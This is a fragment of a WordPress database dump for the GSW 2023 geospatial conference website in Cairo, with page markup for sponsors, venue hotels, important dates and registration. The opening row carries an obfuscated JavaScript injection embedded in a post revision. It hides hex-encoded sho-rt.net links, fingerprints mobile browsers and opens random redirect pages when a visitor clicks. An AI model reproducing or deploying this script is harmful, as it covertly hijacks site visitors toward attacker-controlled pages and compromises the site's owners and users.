_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-01 08:45:05','2023-06-01 08:45:05','',3066,'https://gsw2023.com/?p=4601',0,'revision','',0),
(4602,1,'2023-06-01 08:46:10','2023-06-01 08:46:10','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685606798260{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685608624099{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" 